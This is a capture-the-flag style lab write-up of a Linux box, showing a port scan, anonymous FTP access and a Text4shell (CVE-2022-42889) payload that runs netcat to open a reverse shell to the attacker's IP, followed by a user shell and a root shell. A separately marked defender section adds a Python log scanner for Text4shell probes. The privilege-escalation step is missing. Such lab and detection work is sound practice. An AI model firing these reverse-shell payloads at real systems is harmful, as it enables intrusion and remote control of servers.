Challenge description
Difficulty: Description: Prerequisites:
Basic information
| 🚀 | Local machine | Target machine |
|---|---|---|
| IP | 10.17.5.121 | 10.10.216.153 |
| OS | kali | linux |
Information gathering
Port scan
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
22/tcp open ssh syn-ack
80/tcp open http syn-ack
8080/tcp open http-proxy syn-ack
Path enumeration
http://10.10.216.153/dev/secret.txt
From Testing Department
Hello developers netcat can't execute commands on server you can use traditional netcat commands
Findings
└─$ ftp 10.10.216.153
Connected to 10.10.216.153.
220 (vsFTPd 3.0.5)
Name (10.10.216.153:leo): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||41942|)
150 Here comes the directory listing.
-rw-r--r-- 1 65534 65534 33 Aug 07 17:54 msg.txt
226 Directory send OK.
ftp> get msg.txt
local: msg.txt remote: msg.txt
229 Entering Extended Passive Mode (|||9215|)
150 Opening BINARY mode data connection for msg.txt (33 bytes).
100% |*******************************************************************************************************| 33 7.47 KiB/s 00:00 ETA
226 Transfer complete.
33 bytes received in 00:00 (0.11 KiB/s)
ftp> exit
221 Goodbye.
┌──(leo㉿HACK)-[~/SecLab]
└─$ cat msg.txt
Hello Hackers Welcome in pWnbox.
Vulnerability discovery
XSS

Exploitation
JavaScript RCE inside Java Spring?
webshell
payload
Text4shell (CVE-2022-42889)
${script:javascript:java.lang.Runtime.getRuntime().exec('nc.traditional -v $target_IP $target_PORT -e /bin/bash')}

${script:javascript:java.lang.Runtime.getRuntime().exec('nc.traditional 10.17.5.121 4443 -e /bin/bash')}
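A defender-side check for the Text4shell pattern used above, added here as an example that is not part of the original writeup: it percent-decodes each access-log line (repeatedly, so double encoding does not hide the probe) and flags the `${script:...}`, `${dns:...}` and `${url:...}` interpolation prefixes that Apache Commons Text 1.5 through 1.9 evaluated by default. The log lines are constructed samples in Apache combined format.

```python
import re
from urllib.parse import unquote

# CVE-2022-42889 (Text4shell): StringSubstitutor in Apache Commons Text 1.5-1.9
# evaluated the "script", "dns" and "url" interpolators by default. Ordinary
# lookups such as ${date:...} are not flagged, which keeps false positives down.
TEXT4SHELL_RE = re.compile(r"\$\{\s*(script|dns|url)\s*:", re.IGNORECASE)


def decode_layers(value: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly so a double-encoded probe is still caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_text4shell_probe(log_line: str) -> bool:
    """True if the decoded request line carries a dangerous interpolation prefix."""
    return TEXT4SHELL_RE.search(decode_layers(log_line)) is not None


def scan_access_log(lines):
    """Return (line_number, line) pairs for every hit, 1-indexed like grep -n."""
    return [(n, line) for n, line in enumerate(lines, 1) if is_text4shell_probe(line)]


# Constructed sample lines (Apache combined format), not taken from the target.
SAMPLE_LOG = [
    '10.17.5.121 - - [07/Aug/2023:17:54:01 +0000] "GET /search?query=%24%7Bscript%3Ajavascript%3A%27t4s-canary%27%7D HTTP/1.1" 200 512',
    '10.17.5.121 - - [07/Aug/2023:17:54:05 +0000] "GET /search?query=hello+world HTTP/1.1" 200 512',
    '10.17.5.121 - - [07/Aug/2023:17:54:09 +0000] "GET /search?query=%2524%257Bdns%253Aaddress%253Acanary.example.com%257D HTTP/1.1" 200 512',
    '10.17.5.121 - - [07/Aug/2023:17:54:12 +0000] "GET /search?query=%24%7Bdate%3Ayyyy%7D HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for n, line in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: {line}")
```

Pointing `scan_access_log` at a real log (one string per line) gives the same 1-indexed hit list; the double-encoded third sample and the benign `${date:...}` fourth sample show the two edges the regex alone would miss or over-match.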
User shell
└─$ rlwrap nc -lvnp 4443
Listening on 0.0.0.0 4443
Connection received on 10.10.216.153 42288
ls
bin
boot
dev
etc
home
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
swap.img
sys
tmp
usr
var
id
uid=1000(pwnboy) gid=1000(pwnboy) groups=1000(pwnboy),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),117(lxd)
python3 -c 'import pty; pty.spawn("/bin/bash")'
pwnboy@pwnbox:/$ ls
ls
bin dev home lib32 libx32 media opt root sbin srv sys usr
boot etc lib lib64 lost+found mnt proc run snap swap.img tmp var
pwnboy@pwnbox:/$ whoami
whoami
pwnboy
Root shell


# id
id
uid=0(root) gid=0(root) groups=0(root)